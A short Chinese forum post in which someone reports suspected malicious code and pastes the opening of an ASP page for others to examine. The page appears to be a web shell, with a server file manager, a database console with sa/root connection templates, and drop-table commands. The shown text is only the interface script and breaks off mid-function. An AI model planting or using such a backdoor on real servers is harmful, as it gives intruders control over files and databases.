代码有病毒,谁帮我看下。
<%@ LANGUAGE = VBScript %>
<%%>
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=gb2312">
<title><%=applicationname&" - "&serverip%></title>
<style type="text/css">
<!--
body,td {font-size: 12px;}
input,select{font-size: 12px;background-color:#ffffff;}
.tr {background-color:#efefef;}
.cmd {background-color:#000000;color:#ffffff}
body {margin-left: 0px;margin-top: 0px;margin-right: 0px;margin-bottom: 0px;
<%if action="" then response.write "overflow-x:hidden;overflow-y:hidden;"%>}
a {color: black;text-decoration: none;}
.am {color: #003366;font-size: 11px;}
-->
</style>
<script language="javascript">
<!--
function yesok(){
if (confirm("确认要执行此操作吗?"))
return true;
else
return false;
}
function showfolder(folder){
top.addrform.folderpath.value = folder;
top.addrform.submit();
}
function fullform(fname,faction){
top.hideform.fname.value = fname;
if(faction=="copyfile"){
dname = prompt("请输入复制到目标文件全名称",fname);
top.hideform.fname.value += "||||"+dname;
}else if(faction=="movefile"){
dname = prompt("请输入移动到目标文件全名称",fname);
top.hideform.fname.value += "||||"+dname;
}else if(faction=="copyfolder"){
dname = prompt("请输入移动到目标文件夹全名称",fname);
top.hideform.fname.value += "||||"+dname;
}else if(faction=="movefolder"){
dname = prompt("请输入移动到目标文件夹全名称",fname);
top.hideform.fname.value += "||||"+dname;
}else if(faction=="newfolder"){
dname = prompt("请输入要新建的文件夹全名称",fname);
top.hideform.fname.value = dname;
}else if(faction=="createmdb"){
dname = prompt("请输入要新建的mdb文件全名称,注意不能同名!",fname);
top.hideform.fname.value = dname;
}else if(faction=="compactmdb"){
dname = prompt("请输入要压缩的mdb文件全名称,注意文件是否存在!",fname);
top.hideform.fname.value = dname;
}else{
dname = "other";
}
if(dname!=null){
top.hideform.action.value = faction;
top.hideform.submit();
}else{
top.hideform.fname.value = "";
}
}
function dbcheck(){
if(dbform.dbstr.value == ""){
alert("请先连接数据库");
fulldbstr(0);
return false;
}
return true;
}
function fulldbstr(i){
if(i<0){
return false;
}
str = new array(12);
str[0] = "provider=microsoft.jet.oledb.4.0;data source=<%=repath(session("folderpath"))%>\\db.mdb";
str[1] = "driver={sql server};server=<%=serverip%>,1433;database=dbname;uid=sa;pwd=****";
str[2] = "driver={mysql};server=<%=serverip%>;port=3306;database=dbname;uid=root;pwd=****";
str[3] = "dsn=dsnname";
str[4] = "select * from [tablename] where id<100";
str[5] = "insert into [tablename](user,pass) values(\'gxgl_com\',\'mypass\')";
str[6] = "delete from [tablename] where id=100";
str[7] = "update [tablename] set user=\'gxgl_com\' where id=100";
str[8] = "create table [tablename](id int identity (1,1) not null,user varchar(50))";
str[9] = "drop table [tablename]";
str[10]= "alter table [tablename] add column pass varchar(32)";
str[11]= "alter table [tablename] drop column pass";
str[12]= "当只显示一条数据时即可显示字段的全部字节,可用条件控制查询实现.\n超过一条数据只显示字段的前五十个字节。";
if(i<=3){
dbform.dbstr.value = str[i];
dbform.sqlstr.value = "";
abc.innerhtml="<center>请确认己连接数据库再输入sql操作命令语句。</center>";
}else if(i==12){
alert(str[i]);
}else{
dbform.sqlstr.value = str[i];
}
return true;
}